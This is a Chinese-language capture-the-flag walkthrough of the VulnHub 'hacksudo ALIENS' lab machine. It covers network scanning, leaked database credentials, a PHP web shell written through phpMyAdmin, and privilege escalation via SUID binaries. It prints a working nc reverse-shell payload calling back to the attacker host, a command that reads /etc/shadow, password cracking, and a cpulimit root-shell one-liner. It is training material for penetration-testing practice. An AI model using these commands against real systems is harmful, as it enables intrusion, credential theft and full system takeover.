**声明:**文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究
靶机信息
下载地址:
https://www.vulnhub.com/entry/hacksudo-aliens,676/
名称: hacksudo系列ALIENS
靶场: VulnHub.com
难度: 简单
发布时间: 2021年4月4日
提示信息: 无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 192.168.7.3
靶机:Vbox linux IP自动获取
信息收集
扫描主机
扫描局域网内的靶机IP地址
sudo nmap -sP 192.168.7.1/24
扫描到靶机地址为192.168.7.122
端口扫描
端口扫描是扫描目标机器所开放的服务
sudo nmap -sC -sV -p- 192.168.7.122 -oN aliens.nmap
扫描到3个开放的端口22(SSH),80(HTTP)和9000(HTTP),先从80开始入手
Web渗透
访问80
http://192.168.7.122
是一个目击外星人数据的网站,未发现敏感信息,做个目录扫描
目录扫描
dirsearch -u http://192.168.7.122 -e php,html,txt,zip -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
扫描到2个目录,看看backup这个目录下面有什么
发现一个mysql备份文件,下载下来看看
wget http://192.168.7.122/backup/mysql.bak
cat mysql.bak
发现数据库帐号和密码
user=vishal
password=hacksudo
没有其他可利用的信息了,再来看看9000端口
http://192.168.7.122:9000
原来是phpMyAdmin(mysql数据库管理工具),用刚才获取到的帐号密码登录试试
phpMyAdmin写入shell
登录成功,试试有没有写权限,我们直接写个反弹shell的脚本
select "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.7.3 4444 >/tmp/f');?>" into outfile "/var/www/html/s.php"
写入成功,验证一下
反弹shell
kali攻击机监听4444端口
nc -lvvp 4444
web上执行payload
http://192.168.7.122/shell.php
反弹成功,切换完整的交互shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xter
Ctrl+z
stty -a
stty raw -echo;fg
reset
stty rows 20 columns 82
切换完成,干正事,查找一切可利用的敏感信息
/var/backups目录下发现4个root权限的备份文件,但是没有权限查看,继续找
find / -perm -u=s -type f 2>/dev/null
发现个/usr/bin/date有s权限,我们可以利用这个命令读取文件
/usr/bin/date -f /etc/shadow
发现两个帐号有密码,把他们保存到kali攻击机上
vi passwd.txt
还需要处理一下格式,将前面多余的内容,和最后的单引号去掉
处理好了,现在开始暴破密码
john passwd.txt
拿到hacksudo帐号的密码aliens,登录ssh
ssh hacksudo@192.168.7.122
登录成功,找找可利用的敏感信息
/home/hacksudo/Desktop目录下找到user.txt
cd /home/hacksudo/Desktop
ls
cat user.txt
cpulimit提权
/home/hacksudo/Desktop目录下发现cpulimit文件有s权限
cd /home/hacksudo/Download
ls -al
这个程序是可以提权的
./cpulimit -l 100 -f -- /bin/sh -p
提权成功,查看最后一个flag
cd /root
ls -al
cat root.txt
OK,拿到root.txt,游戏结束
这篇文章到这里就结束了,喜欢打靶的小伙伴可以关注"伏波路上学安全"微信公众号,或扫描下面二维码关注,我会持续更新打靶文章,让我们一起在打靶中学习进步吧.
